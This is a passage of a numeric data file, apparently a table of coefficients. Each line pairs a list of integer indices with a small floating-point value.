[0,6,6,6,7,10 , 2.00145873512e-12],
[0,6,6,6,8,11 , 5.5966774996e-11],
[0,6,6,6,9,10 , 5.70529992921e-11],
[0,6,6,6,10 , 1.09716194545e-09],
[0,6,6,7,7,11 , 2.22657933416e-13],
[0,6,6,7,8,10 , -4.28127078577e-11],
[0,6,6,7,9,11 , -4.26728610755e-11],
[0,6,6,7,11 , -8.30581150703e-10],
[0,6,6,8,8,11 , 9.78363058442e-13],
[0,6,6,8,9,10 , -1.8960320003e-13],
[0,6,6,8,10 , 1.04178656255e-10],
[0,6,6,9,9,11 , -1.12317928056e-12],
[0,6,6,9,11 , 7.62108865635e-11],
[0,6,6,10,10,11 , 1.26980442514e-11],
[0,6,6,11 , 4.44260821218e-09],
[0,6,6,11,11,11 , 1.23893442496e-11],
[0,6,7,7,7,10 , -1.62881958925e-12],
[0,6,7,7,8,11 , 3.22263485504e-11],
[0,6,7,7,9,10 , 3.22452048117e-11],
[0,6,7,7,10 , 6.40085053066e-10],
[0,6,7,8,8,10 , 4.2091357874e-12],
[0,6,7,8,9,11 , 4.88471949117e-12],
[0,6,7,8,11 , 2.63270260458e-11],
[0,6,7,9,9,10 , 6.29462496615e-12],
[0,6,7,9,10 , 4.62334492857e-11],
[0,6,7,10 , -1.58724040714e-09],
[0,6,7,10,10,10 , -3.31822449589e-12],
[0,6,7,10,11,11 , -4.01923855472e-12],
[0,6,8,8,8,11 , -1.07185447699e-10],
[0,6,8,8,9,10 , -1.07805043023e-10],
[0,6,8,8,10 , -2.40993378121e-09],
[0,6,8,9,9,11 , -1.08144680366e-10],
[0,6,8,9,11 , -2.41769094887e-09],
[0,6,8,10 , -1.28730396419e-19],
[0,6,8,10,10,11 , -1.18200628608e-10],
[0,6,8,11 , -5.43035820422e-08],
[0,6,8,11,11,11 , -1.18076404532e-10],
[0,6,9 , -9.29353961816e-20],
[0,6,9,9 , -1.14217098981e-20],
[0,6,9,9,9,10 , -1.09491086694e-10],
[0,6,9,9,10 , -2.4341243561e-09],
[0,6,9,10 , -5.4968709656e-08],
[0,6,9,10,10,10 , -1.1991486384e-10],
[0,6,9,10,11,11 , -1.19325756523e-10],
[0,6,9,11 , 1.32933301111e-19],
[0,6,10 , -9.13250777629e-07],
[0,6,10,10 , 1.20185207101e-20],
[0,6,10,10,10 , -2.71420171118e-09],
[0,6,10,11,11 , -2.7053297782e-09],
[0,6,11 , 7.5563279829e-19],
[0,7,7,7,7,11 , 1.54027463154e-12],
[0,7,7,7,8,10 , -2.39808329182e-11],
[0,7,7,7,9,11 , -2.42068349906e-11],
[0,7,7,7,11 , -4.82542021316e-10],
[0,7,7,8,8,11 , -7.10956488925e-12],
[0,7,7,8,9,10 , -7.42401656346e-12],
[0,7,7,8,10 , -1.00459774909e-10],
[0,7,7,9,9,11 , -8.03820401144e-12],
[0,7,7,9,11 , -9.90158944535e-11],
[0,7,7,10,10,11 , -1.22033279238e-12],
[0,7,7,11 , -8.41249499394e-10],
[0,7,7,11,11,11 , -1.79340678117e-12],
[0,7,8 , 4.68779796746e-20],
[0,7,8,8,8,10 , 8.11417813893e-11],
[0,7,8,8,9,11 , 8.12710928213e-11],
[0,7,8,8,11 , 1.83676263604e-09],
[0,7,8,9,9,10 , 8.10533844875e-11],
[0,7,8,9,10 , 1.82716023117e-09],
[0,7,8,10 , 4.18526755122e-08],
[0,7,8,10,10,10 , 9.0499347683e-11],
[0,7,8,10,11,11 , 9.03001447595e-11],
[0,7,8,11 , 3.21541647712e-20],
[0,7,9,9,9,11 , 8.22893951837e-11],
[0,7,9,9,11 , 1.83442500179e-09],
[0,7,9,10 , -3.7053141949e-20],
[0,7,9,10,10,11 , 9.08209901536e-11],
[0,7,9,11 , 4.16148213554e-08],
[0,7,9,11,11,11 , 9.16996162617e-11],
[0,7,10 , 5.39718806079e-19],
[0,7,10,10,11 , 2.07227857811e-09],
[0,7,11 , 7.40471712835e-07],
[0,7,11,11,11 , 2.09847506182e-09],
[0,8,8,8,8,11 , 1.9679786358e-11],
[0,8,8,8,9,10 , 2.23389658176e-11],
[0,8,8,8,10 , 3.25379838392e-10],
[0,8,8,9,9,11 , 2.46952553069e-11],
[0,8,8,9,11 , 4.09438630213e-10],
[0,8,8,10 , 3.06015467614e-20],
[0,8,8,10,10,11 , -5.44159554444e-12],
[0,8,8,11 , 6.22265222269e-09],
[0,8,8,11,11,11 , -4.92625741233e-12],
[0,8,9 , 1.32878293601e-20],
[0,8,9,9,9,10 , 2.77923068836e-11],
[0,8,9,9,10 , 4.62391266442e-10],
[0,8,9,10 , 7.77459744636e-09],
[0,8,9,10,10,10 , -2.62294175732e-12],
[0,8,9,10,11,11 , -2.60828323854e-12],
[0,8,10 , 1.08877431834e-07],
[0,8,10,10,10 , -2.960432433e-10],
[0,8,10,11,11 , -2.64360002833e-10],
[0,8,11 , 1.02808623973e-19],
[0,9,9,9,9,11 , 2.97184604452e-11],
[0,9,9,9,11 , 5.16830922431e-10],
[0,9,9,10 , -1.76917389413e-20],
[0,9,9,10,10,11 , 2.59378809603e-13],
[0,9,9,11 , 8.68913611022e-09],
[0,9,9,11,11,11 , -4.4913315202e-14],
[0,9,10 , -8.02563717523e-20],
[0,9,10,10,11 , -2.06346236146e-10],
[0,9,11 , 1.09920552347e-07],
[0,9,11,11,11 , -2.08550130633e-10],
[0,10 , -3.55753837847e-20],
[0,10,10,10 , -2.38840130069e-20],
[0,10,10,10,10,11 , -2.94435072383e-11],
[0,10,10,11 , -1.08009930948e-08],
[0,10,10,11,11,11 , -2.91895109997e-11],
[0,10,11 , -2.30287082535e-20],
[0,11 , -4.40457132572e-20],
[0,11,11,11 , -1.14657193435e-08],
[0,11,11,11,11,11 , -2.81155034863e-11],
[1,1 , 1.87435255668e-05],
[1,1,1,1 , 1.90415511274e-08],
[1,1,1,1,1,1 , -4.72066179417e-11],
[1,1,1,1,2,2 , -4.14994515695e-11],
[1,1,1,1,3,3 , -3.1970396278e-11],
[1,1,1,1,4,4 , -7.64238936818e-12],
[1,1,1,1,4,10 , 4.2159253242e-13],
[1,1,1,1,5 , -2.08779218791e-11],
[1,1,1,1,5,5 , -2.65826337341e-12],
[1,1,1,1,5,7 , 2.69306201921e-12],
[1,1,1,1,5,9 , -2.22560102688e-12],
[1,1,1,1,6,6 , -6.98265944028e-12],
[1,1,1,1,6,8 , -3.02998777475e-12],
[1,1,1,1,7 , 4.94472467402e-11],
[1,1,1,1,7,7 , -2.05310515998e-12],
[1,1,1,1,7,9 , 1.19614122431e-12],
[1,1,1,1,8,8 , 5.48325017142e-11],
[1,1,1,1,9 , 1.16706558696e-09],
[1,1,1,1,9,9 , 5.59238271362e-11],
[1,1,1,1,10,10 , 6.16912487343e-11],
[1,1,1,1,11,11 , 6.37942059201e-11],
[1,1,1,2,4,11 , -7.54587141139e-13],
[1,1,1,2,5,6 , 3.23371220994e-12],
[1,1,1,2,5,8 , 2.77861007111e-12],
[1,1,1,2,6 , 9.74457079681e-11],
[1,1,1,2,6,7 , -3.28279202993e-12],
[1,1,1,2,6,9 , 3.45934646783e-12],
[1,1,1,2,7,8 , -8.08025320491e-13],
[1,1,1,2,8 , -1.12800413001e-09],
[1,1,1,2,8,9 , -5.82930908227e-11],
[1,1,1,2,10,11 , -6.60728367063e-11],
[1,1,1,3,4,6 , -5.39077212326e-12],
[1,1,1,3,4,8 , 1.82465008281e-12],
[1,1,1,3,5,11 , -9.01941524285e-13],
[1,1,1,3,6,10 , -1.99607176218e-12],
[1,1,1,3,7,11 , 2.5832147642e-14],
[1,1,1,3,8,10 , 5.70416661865e-11],
[1,1,1,3,9,11 , 5.63793374458e-11],
[1,1,1,3,11 , 1.09763164346e-09],
[1,1,2,2 , 1.79403725116e-08],
[1,1,2,2,2,2 , -3.93895168037e-11],
[1,1,2,2,3,3 , -3.27837126319e-11],
[1,1,2,2,4,4 , -5.09635225268e-12],
[1,1,2,2,4,10 , 7.1476671091e-13],
[1,1,2,2,5 , -6.81228810662e-11],
[1,1,2,2,5,5 , -2.20512713849e-12],
[1,1,2,2,5,7 , 2.29834943449e-12],
[1,1,2,2,5,9 , -3.04626517415e-12],
[1,1,2,2,6,6 , -4.71447921447e-12],
[1,1,2,2,6,8 , -3.63926215411e-12],
[1,1,2,2,7 , 6.32899030847e-11],
[1,1,2,2,7,7 , -2.27357638292e-12],
[1,1,2,2,7,9 , 5.58262355987e-13],
[1,1,2,2,8,8 , 6.03234597089e-11],
[1,1,2,2,9 , 1.16852965741e-09],
[1,1,2,2,9,9 , 5.96498730372e-11],
[1,1,2,2,10,10 , 6.76079710956e-11],
[1,1,2,2,11,11 , 6.71824454294e-11],
[1,1,2,3,4 , -4.43872093358e-11],
[1,1,2,3,4,5 , 3.72396464918e-12],
[1,1,2,3,4,7 , -3.88793608319e-12],
[1,1,2,3,4,9 , -1.84882176217e-12],
[1,1,2,3,5,10 , 1.89605633928e-12],
[1,1,2,3,6,11 , 1.86801701675e-12],
[1,1,2,3,7,10 , 5.80622117193e-14],
[1,1,2,3,8,11 , -5.90181957625e-11],
[1,1,2,3,9,10 , -5.89740171386e-11],
[1,1,2,3,10 , -1.1490035404e-09],
[1,1,3,3 , 1.33337569959e-08],
[1,1,3,3,3,3 , -2.58017086321e-11],
[1,1,3,3,4,4 , -4.61642086544e-12],
[1,1,3,3,4,10 , 1.04497217718e-12],
[1,1,3,3,5 , -7.02737001093e-12],
[1,1,3,3,5,5 , -2.41801579479e-12],
[1,1,3,3,5,7 , 2.65487771276e-12],
[1,1,3,3,5,9 , -8.16245162804e-13],
[1,1,3,3,6,6 , -5.92351824321e-12],
[1,1,3,3,6,8 , -8.50085518082e-13],
[1,1,3,3,7 , 1.95762630289e-11],
[1,1,3,3,7,7 , -3.50098548149e-12],
[1,1,3,3,7,9 , -8.11140774739e-13],
[1,1,3,3,8,8 , 5.12142641215e-11],
[1,1,3,3,9 , 9.4734277508e-10],
[1,1,3,3,9,9 , 4.94890757607e-11],
[1,1,3,3,10,10 , 5.65960896099e-11],
[1,1,3,3,11,11 , 5.64050897256e-11],
[1,1,4,4 , 3.22053287562e-09],
[1,1,4,4,4,4 , -5.45699416149e-12],
[1,1,4,4,4,10 , 5.15514754929e-13],
[1,1,4,4,5 , 1.22208382327e-11],
[1,1,4,4,5,5 , -2.26822395471e-12],
[1,1,4,4,5,7 , 2.41243241531e-12],
[1,1,4,4,5,9 , 3.02608002917e-13],
[1,1,4,4,6,6 , -5.88706245102e-12],
[1,1,4,4,6,8 , 8.20272643147e-13],
[1,1,4,4,7 , -2.60718062235e-11],
[1,1,4,4,7,7 , -2.65110124297e-12],
[1,1,4,4,7,9 , -9.62419688778e-13],
[1,1,4,4,8,8 , 1.27644107772e-11],
[1,1,4,4,9 , 2.5697899197e-10],
[1,1,4,4,9,9 , 1.25202486281e-11],
[1,1,4,4,10,10 , 1.43648327884e-11],
[1,1,4,4,11,11 , 1.43060805119e-11],
[1,1,4,5,5,10 , -5.81939326854e-13],
[1,1,4,5,6,11 , -5.40602963671e-13],
[1,1,4,5,7,10 , 8.07994156481e-14],
[1,1,4,5,8,11 , 1.09327193494e-11],
[1,1,4,5,9,10 , 1.11086015081e-11],
[1,1,4,5,10 , 2.14336131799e-10],
[1,1,4,6,6,10 , -1.1827779199e-12],
[1,1,4,6,7,11 , 4.26887803774e-14],
[1,1,4,6,8,10 , 1.6672203202e-11],
[1,1,4,6,9,11 , 1.64934244478e-11],
[1,1,4,6,11 , 3.10637904228e-10],
[1,1,4,7,7,10 , 6.4903060658e-13],
[1,1,4,7,8,11 , -1.25223219683e-11],
[1,1,4,7,9,10 , -1.2571908358e-11],
[1,1,4,7,10 , -2.44707311378e-10],
[1,1,4,8,8,10 , -2.93687192045e-12],
[1,1,4,8,9,11 , -3.06950960729e-12],
[1,1,4,8,11 , -5.43200746549e-11],
[1,1,4,9,9,10 , -3.33454650003e-12],
[1,1,4,9,10 , -6.35556412514e-11],
[1,1,4,10 , -1.85656774759e-09],
[1,1,4,10,10,10 , 4.51747875095e-13],
[1,1,4,10,11,11 , 1.47013620811e-12],
[1,1,5 , 2.86931819882e-08],
[1,1,5,5 , 2.18014815955e-10],
[1,1,5,5,5 , 6.93512413387e-12],
[1,1,5,5,5,5 , -1.18268662995e-12],
[1,1,5,5,5,7 , 6.33394245516e-13],
[1,1,5,5,5,9 , -5.57532425755e-13],
[1,1,5,5,6,6 , -1.88878812365e-12],
[1,1,5,5,6,8 , -1.09466724797e-12],
[1,1,5,5,7 , 2.10493248688e-11],
[1,1,5,5,7,7 , -1.25885894781e-12],
[1,1,5,5,7,9 , 4.69090917997e-13],
[1,1,5,5,8,8 , 7.04283429412e-12],
[1,1,5,5,9 , 1.34595276289e-10],
[1,1,5,5,9,9 , 6.76964988204e-12],
[1,1,5,5,10,10 , 8.64525065456e-12],
[1,1,5,5,11,11 , 8.01813779128e-12],
[1,1,5,6,6 , -3.7208505911e-11],
[1,1,5,6,6,7 , 2.13768870499e-12],
[1,1,5,6,6,9 , -1.61640427741e-12],
[1,1,5,6,7,8 , 9.28204900308e-13],
[1,1,5,6,8 , 1.91124710468e-10],
[1,1,5,6,8,9 , 1.12556515784e-11],
[1,1,5,6,10,11 , 1.33683322469e-11],
[1,1,5,7 , -2.0409135322e-09],
[1,1,5,7,7 , 1.48077501955e-11],
[1,1,5,7,7,7 , 7.70931074008e-13],
[1,1,5,7,7,9 , -4.41408935396e-13],
[1,1,5,7,8,8 , -8.34174797169e-12],
[1,1,5,7,9 , -1.33599834883e-10],
[1,1,5,7,9,9 , -8.26918468553e-12],
[1,1,5,7,10,10 , -9.90667370644e-12],
[1,1,5,7,11,11 , -9.50781190823e-12],
[1,1,5,8,8 , 7.48377675726e-11],
[1,1,5,8,8,9 , 2.44034863958e-12],
[1,1,5,8,10,11 , 4.2702574373e-12],
[1,1,5,9 , 1.29094195237e-09],
[1,1,5,9,9 , 6.01337031192e-11],
[1,1,5,9,9,9 , 1.82645137952e-12],
[1,1,5,9,10,10 , 4.30729655896e-12],
[1,1,5,9,11,11 , 3.87602413644e-12],
[1,1,5,10,10 , 9.41629608442e-11],
[1,1,5,11,11 , 9.14962118022e-11],
[1,1,6 , -8.85811174371e-20],
[1,1,6,6 , 2.99762881197e-09],
[1,1,6,6,6,6 , -5.99273506437e-12],
[1,1,6,6,6,8 , -2.37720661767e-12],
[1,1,6,6,7 , 3.53013532313e-11],
[1,1,6,6,7,7 , -2.53655584514e-12],
[1,1,6,6,7,9 , 1.33964363266e-12],
[1,1,6,6,8,8 , 1.65490532385e-11],
[1,1,6,6,9 , 3.13234317364e-10],
[1,1,6,6,9,9 , 1.66552488277e-11],
[1,1,6,6,10,10 , 1.98678873536e-11],
[1,1,6,6,11,11 , 1.98636205776e-11],
[1,1,6,7,7,8 , -6.45767725747e-13],
[1,1,6,7,8 , -2.3222205552e-10],
[1,1,6,7,8,9 , -1.31925318497e-11],
[1,1,6,7,10,11 , -1.57128449034e-11],
[1,1,6,8 , 2.61597838648e-09],
[1,1,6,8,8,8 , 8.16606374008e-13],
[1,1,6,8,9 , 5.6923571781e-11],
[1,1,6,8,9,9 , 5.1985854936e-13],
[1,1,6,8,10,10 , 4.17915440918e-12],
[1,1,6,8,11,11 , 3.70387201623e-12],
[1,1,6,9,10,11 , 3.77922166495e-12],
[1,1,6,10,11 , 1.11110193888e-10],
[1,1,7 , -1.02478697617e-07],
[1,1,7,7 , 2.47694961561e-10],
[1,1,7,7,7 , 4.67669317298e-11],
[1,1,7,7,7,7 , -2.66566424255e-12],
[1,1,7,7,7,9 , 2.67830433037e-13],
[1,1,7,7,8,8 , 9.75992306472e-12],
[1,1,7,7,9 , 2.07006979642e-10],
[1,1,7,7,9,9 , 9.33900691452e-12],
[1,1,7,7,10,10 , 1.22797192893e-11],
[1,1,7,7,11,11 , 1.19138074342e-11],
[1,1,7,8,8 , 3.72123159344e-11],
[1,1,7,8,8,9 , 4.52219773798e-12],
[1,1,7,8,10,11 , 1.71797501733e-12],
[1,1,7,9 , -9.19823624493e-10],
[1,1,7,9,9 , 5.67710039568e-11],
[1,1,7,9,9,9 , 7.37699752479e-12],
[1,1,7,9,10,10 , 3.3472005318e-12],
[1,1,7,9,11,11 , 2.41642330773e-12],
[1,1,7,10,10 , 2.56889116727e-12],
[1,1,7,11,11 , -5.85596911072e-12],
[1,1,8 , -9.41556530212e-19],
[1,1,8,8 , -5.38091086659e-08],
[1,1,8,8,8,8 , -1.07926745253e-10],
[1,1,8,8,9 , -2.33066063531e-09],
[1,1,8,8,9,9 , -1.04715018754e-10],
[1,1,8,8,10,10 , -1.16542011448e-10],
[1,1,8,8,11,11 , -1.16003828363e-10],
[1,1,8,9 , 3.13096133657e-20],
[1,1,8,9,10,11 , -1.17543553407e-10],
[1,1,8,10,11 , -2.65257594028e-09],
[1,1,9 , -9.36994084802e-07],
[1,1,9,9 , -5.39868089913e-08],
[1,1,9,9,9 , -2.20851315267e-09],
[1,1,9,9,9,9 , -1.0406062624e-10],
[1,1,9,9,10,10 , -1.1802461298e-10],
[1,1,9,9,11,11 , -1.15958982017e-10],
[1,1,9,10,10 , -2.66421511027e-09],
[1,1,9,11,11 , -2.60330263029e-09],
[1,1,10 , 1.00730746274e-19],
[1,1,10,10 , -6.25939336033e-08],
[1,1,10,10,10,10 , -1.27595369791e-10],
[1,1,10,10,11,11 , -1.25168303573e-10],
[1,1,10,11 , 3.74795535548e-20],
[1,1,11,11 , -6.10351679993e-08],
[1,1,11,11,11,11 , -1.2484173284e-10],
[1,2,2,2,4,11 , -7.36654601755e-13],
[1,2,2,2,5,6 , 3.12560198738e-12],
[1,2,2,2,5,8 , 3.62087158302e-12],
[1,2,2,2,6 , 1.31078248925e-10],
[1,2,2,2,6,7 , -3.38889019353e-12],
[1,2,2,2,6,9 , 4.32973409115e-12],
[1,2,2,2,7,8 , -8.67121987134e-13],
[1,2,2,2,8 , -1.21493228468e-09],
[1,2,2,2,8,9 , -6.24647119549e-11],
[1,2,2,2,10,11 , -6.91387550489e-11],
[1,2,2,3,4,6 , -5.6392363319e-12],
[1,2,2,3,4,8 , 1.60824776211e-12],
[1,2,2,3,5,11 , -2.13607245808e-12],
[1,2,2,3,6,10 , -2.25011346744e-12],
[1,2,2,3,7,11 , -3.22228852442e-13],
[1,2,2,3,8,10 , 6.07904970814e-11],
[1,2,2,3,9,11 , 6.06242389981e-11],
[1,2,2,3,11 , 1.19343244404e-09],
[1,2,3,3,4,11 , -1.04489961511e-12],
[1,2,3,3,5,6 , 3.71058915149e-12],
[1,2,3,3,5,8 , 1.04520132944e-12],
[1,2,3,3,6 , 2.59825375784e-11],
[1,2,3,3,6,7 , -4.38004194849e-12],
[1,2,3,3,6,9 , 5.35646619111e-13],
[1,2,3,3,7,8 , 1.35705018463e-12],
[1,2,3,3,8 , -1.0182186314e-09],
[1,2,3,3,8,9 , -5.25642713588e-11],
[1,2,3,3,10,11 , -5.80025072692e-11],
[1,2,4,4,4,11 , -1.03862020817e-12],
[1,2,4,4,5,6 , 3.12174904372e-12],
[1,2,4,4,5,8 , -3.0754622175e-13],
[1,2,4,4,6 , -1.12673969437e-11],
[1,2,4,4,6,7 , -3.46058127442e-12],
[1,2,4,4,6,9 , -5.90663715485e-13],
[1,2,4,4,7,8 , 9.12613410593e-13],
[1,2,4,4,8 , -2.61641531083e-10],
[1,2,4,4,8,9 , -1.37410918682e-11],
[1,2,4,4,10,11 , -1.54723469413e-11],
[1,2,4,5,5,11 , 5.89494584993e-13],
[1,2,4,5,6,10 , 8.12451832014e-13],
[1,2,4,5,7,11 , -1.68889621697e-13],
[1,2,4,5,8,10 , -1.12214122323e-11],
[1,2,4,5,9,11 , -1.12264113369e-11],
[1,2,4,5,11 , -2.12426540191e-10],
[1,2,4,6,6,11 , 8.85513423864e-13],
[1,2,4,6,7,10 , -1.64905416227e-13],
[1,2,4,6,8,11 , -1.71550685013e-11],
[1,2,4,6,9,10 , -1.71638903188e-11],
[1,2,4,6,10 , -3.24522845971e-10],
[1,2,4,7,7,11 , -5.21476521539e-13],
[1,2,4,7,8,10 , 1.28557119068e-11],
[1,2,4,7,9,11 , 1.27147070281e-11],
[1,2,4,7,11 , 2.41442897203e-10],
[1,2,4,8,8,11 , 2.24439476486e-12],
[1,2,4,8,9,10 , 2.87106470284e-12],
[1,2,4,8,10 , 5.05564631598e-11],
[1,2,4,9,9,11 , 3.27192746425e-12],
[1,2,4,9,11 , 5.84138429991e-11],
[1,2,4,10,10,11 , -1.69159483044e-12],
[1,2,4,11 , 1.17812139781e-09],
[1,2,4,11,11,11 , -1.29598109292e-12],
[1,2,5 , 2.00640929381e-20],
[1,2,5,5,5,6 , 1.07311374237e-12],
[1,2,5,5,5,8 , 1.07841652443e-12],
[1,2,5,5,6 , 3.09012902157e-11],
[1,2,5,5,6,7 , -1.36311480315e-12],
[1,2,5,5,6,9 , 1.34134579166e-12],
[1,2,5,5,7,8 , -8.2506988297e-13],
[1,2,5,5,8 , -1.28178986539e-10],
[1,2,5,5,8,9 , -7.30957507593e-12],
[1,2,5,5,10,11 , -8.75022665337e-12],
[1,2,5,6 , -1.54980137836e-09],
[1,2,5,6,6,6 , 2.67058418777e-12],
[1,2,5,6,6,8 , 1.84437417726e-12],
[1,2,5,6,7 , -3.14333591793e-11],
[1,2,5,6,7,7 , 1.60069636225e-12],
[1,2,5,6,7,9 , -1.12061485453e-12],
[1,2,5,6,8,8 , -1.12960714186e-11],
[1,2,5,6,9 , -1.91654592132e-10],
[1,2,5,6,9,9 , -1.14943828299e-11],
[1,2,5,6,10,10 , -1.35271548383e-11],
[1,2,5,6,11,11 , -1.36188054396e-11],
[1,2,5,7,7,8 , 5.0734986428e-13],
[1,2,5,7,8 , 1.4909083679e-10],
[1,2,5,7,8,9 , 8.6931228068e-12],
[1,2,5,7,10,11 , 1.03529703821e-11],
[1,2,5,8 , -2.50458248831e-09],
[1,2,5,8,8,8 , -3.3347751974e-12],
[1,2,5,8,9 , -8.35716442977e-11],
[1,2,5,8,9,9 , -2.52030020933e-12],
[1,2,5,8,10,10 , -4.99786329645e-12],
[1,2,5,8,11,11 , -4.88925723512e-12],
[1,2,5,9,10,11 , -4.6220225148e-12],
[1,2,5,10,11 , -1.13287590164e-10],
[1,2,6 , -1.59580446493e-07],
[1,2,6,6,6 , 7.26997091577e-11],
[1,2,6,6,6,7 , -3.20069009512e-12],
[1,2,6,6,6,9 , 2.72980941064e-12],
[1,2,6,6,7,8 , -1.31298556749e-12],
[1,2,6,6,8 , -3.00520221279e-10],
[1,2,6,6,8,9 , -1.74994518738e-11],
[1,2,6,6,10,11 , -2.10282145625e-11],
[1,2,6,7 , 1.98232612441e-09],
[1,2,6,7,7 , 2.77344352552e-11],
[1,2,6,7,7,7 , -1.78930962135e-12],
[1,2,6,7,7,9 , 6.21727764395e-13],
[1,2,6,7,8,8 , 1.34550557616e-11],
[1,2,6,7,9 , 2.32469724077e-10],
[1,2,6,7,9,9 , 1.35674316769e-11],
[1,2,6,7,10,10 , 1.61598362538e-11],
[1,2,6,7,11,11 , 1.61233345282e-11],
[1,2,6,8,8 , -7.77551533509e-11],
[1,2,6,8,8,9 , -1.2593025969e-12],
[1,2,6,8,10,11 , -4.39725965759e-12],
[1,2,6,9 , -3.42606449671e-09],
[1,2,6,9,9 , -6.41201425515e-11],
[1,2,6,9,9,9 , -3.87523226209e-13],
[1,2,6,9,10,10 , -4.09839222898e-12],
[1,2,6,9,11,11 , -3.87800199653e-12],
[1,2,6,10,10 , -1.2502137662e-10],
[1,2,6,11,11 , -1.15777619549e-10],
[1,2,7,7,7,8 , -3.43449645796e-13],
[1,2,7,7,8 , -1.76207518272e-10],
[1,2,7,7,8,9 , -1.01554430183e-11],
[1,2,7,7,10,11 , -1.26010113091e-11],
[1,2,7,8 , 3.67880588168e-10],
[1,2,7,8,8,8 , -4.56502341025e-12],
[1,2,7,8,9 , -5.38184191456e-11],
[1,2,7,8,9,9 , -4.89521219428e-12],
[1,2,7,8,10,10 , -2.18518338186e-12],
[1,2,7,8,11,11 , -2.30896452998e-12],
[1,2,7,9,10,11 , -2.36797681857e-12],
[1,2,7,10,11 , -1.07417622033e-11],
[1,2,8 , 9.98686931217e-07],
[1,2,8,8 , 1.77598986238e-19],
[1,2,8,8,8 , 2.449586513e-09],
[1,2,8,8,8,9 , 1.0968887389e-10],
[1,2,8,8,10,11 , 1.20108631024e-10],
[1,2,8,9 , 5.5748945162e-08],
[1,2,8,9,9 , 2.43228259569e-09],
[1,2,8,9,9,9 , 1.09217410267e-10],
[1,2,8,9,10,10 , 1.20836212919e-10],
[1,2,8,9,11,11 , 1.20768050098e-10],
[1,2,8,10,10 , 2.74510012131e-09],
[1,2,8,11,11 , 2.7444519922e-09],
[1,2,9 , -1.65655821681e-18],
[1,2,9,9 , -1.81753914454e-19],
[1,2,9,9,9 , -1.18656990919e-20],
[1,2,9,9,10,11 , 1.20527076758e-10],
[1,2,9,10,11 , 2.7468952381e-09],
[1,2,10,10 , 9.85627058888e-20],
[1,2,10,10,10,11 , 1.28981089491e-10],
[1,2,10,11 , 6.4141882172e-08],
[1,2,10,11,11,11 , 1.29173538715e-10],
[1,2,11 , -1.03814475598e-19],
[1,2,11,11 , -1.0307414895e-19],
[1,3,3,3,4,6 , -4.54259351222e-12],
[1,3,3,3,4,8 , 1.7182716099e-12],
[1,3,3,3,5,11 , -1.27051717841e-12],
[1,3,3,3,6,10 , -1.27348256298e-12],
[1,3,3,3,7,11 , -3.86586164126e-13],
[1,3,3,3,8,10 , 5.06477199073e-11],
[1,3,3,3,9,11 , 4.94429832157e-11],
[1,3,3,3,11 , 9.46564190898e-10],
[1,3,4 , 1.27650512129e-20],
[1,3,4,4,4,6 , -3.88910873786e-12],
[1,3,4,4,4,8 , 1.5070632118e-12],
[1,3,4,4,5,11 , 4.94972210235e-14],
[1,3,4,4,6,10 , 2.9149497405e-13],
[1,3,4,4,7,11 , -6.21284104241e-13],
[1,3,4,4,8,10 , 1.35441549097e-11],
[1,3,4,4,9,11 , 1.32510755087e-11],
[1,3,4,4,11 , 2.49729763937e-10],
[1,3,4,5,5,6 , -2.35329570693e-12],
[1,3,4,5,5,8 , -2.33381846023e-14],
[1,3,4,5,6 , 8.00518833898e-12],
[1,3,4,5,6,7 , 2.60285794167e-12],
[1,3,4,5,6,9 , 2.34944208414e-13],
[1,3,4,5,7,8 , -3.88060028712e-13],
[1,3,4,5,8 , 1.88321791037e-10],
[1,3,4,5,8,9 , 1.00333150385e-11],
[1,3,4,5,10,11 , 1.09849868227e-11],
[1,3,4,6 , 3.49767462675e-09],
[1,3,4,6,6,6 , -5.51089462162e-12],
[1,3,4,6,6,8 , 2.20430447397e-13],
[1,3,4,6,7 , -4.57674274156e-12],
[1,3,4,6,7,7 , -3.10856259095e-12],
[1,3,4,6,7,9 , -7.38342314311e-13],
[1,3,4,6,8,8 , 1.51966123374e-11],
[1,3,4,6,9 , 2.75679298464e-10],
[1,3,4,6,9,9 , 1.48869623775e-11],
[1,3,4,6,10,10 , 1.67781984762e-11],
[1,3,4,6,11,11 , 1.67101742053e-11],
[1,3,4,7,7,8 , 1.06800519045e-12],
[1,3,4,7,8 , -2.15010269225e-10],
[1,3,4,7,8,9 , -1.11715931694e-11],
[1,3,4,7,10,11 , -1.25918287089e-11],
[1,3,4,8 , -2.22287452308e-09],
[1,3,4,8,8,8 , -4.03260851636e-12],
[1,3,4,8,9 , -9.78332362538e-11],
[1,3,4,8,9,9 , -4.9956317244e-12],
[1,3,4,8,10,10 , -7.94804766617e-13],
[1,3,4,8,11,11 , -6.31475290286e-13],
[1,3,4,9,10,11 , -1.16298393516e-12],
[1,3,4,10,11 , -1.10918887312e-11],
[1,3,5,5,5,11 , -5.69219350358e-13],
[1,3,5,5,6,10 , -8.40580131201e-13],
[1,3,5,5,7,11 , 4.89780460184e-13],
[1,3,5,5,8,10 , 7.77803266415e-12],
[1,3,5,5,9,11 , 7.65169689643e-12],
[1,3,5,5,11 , 1.43441262502e-10],
[1,3,5,6,6,11 , -1.16855855659e-12],
[1,3,5,6,7,10 , 5.06867428584e-13],
[1,3,5,6,8,11 , 1.19783320362e-11],
[1,3,5,6,9,10 , 1.20010056332e-11],
[1,3,5,6,10 , 2.2559879313e-10],
[1,3,5,7,7,11 , -6.43671765447e-14],
[1,3,5,7,8,10 , -9.14195303941e-12],
[1,3,5,7,9,11 , -9.06909767248e-12],
[1,3,5,7,11 , -1.68796533885e-10],
[1,3,5,8,8,11 , 2.50895354465e-12],
[1,3,5,8,9,10 , 2.3378450217e-12],
[1,3,5,8,10 , 6.58657851272e-11],
[1,3,5,9,9,11 , 2.22578471483e-12],
[1,3,5,9,11 , 6.16752857166e-11],
[1,3,5,10,10,11 , 5.08747340217e-12],
[1,3,5,11 , 1.32703569983e-09],
[1,3,5,11,11,11 , 5.64342803122e-12],
[1,3,6,6,6,10 , -1.52432630122e-12],
[1,3,6,6,7,11 , 5.2019354392e-13],
[1,3,6,6,8,10 , 1.85390564765e-11],
[1,3,6,6,9,11 , 1.83272649746e-11],
[1,3,6,6,11 , 3.51823463318e-10],
[1,3,6,7,7,10 , 2.53629690321e-13],
[1,3,6,7,8,11 , -1.43020450214e-11],
[1,3,6,7,9,10 , -1.40495191675e-11],
[1,3,6,7,10 , -2.75552233737e-10],
[1,3,6,8,8,10 , 1.54528673866e-12],
[1,3,6,8,9,11 , 1.07657701048e-12],
[1,3,6,8,11 , 6.10553997346e-11],
[1,3,6,9,9,10 , 4.81355130617e-13],
[1,3,6,9,10 , 4.96306795269e-11],
[1,3,6,10 , 2.44274424429e-09],
[1,3,6,10,10,10 , 5.37756139995e-12],
[1,3,6,10,11,11 , 5.24141574358e-12],
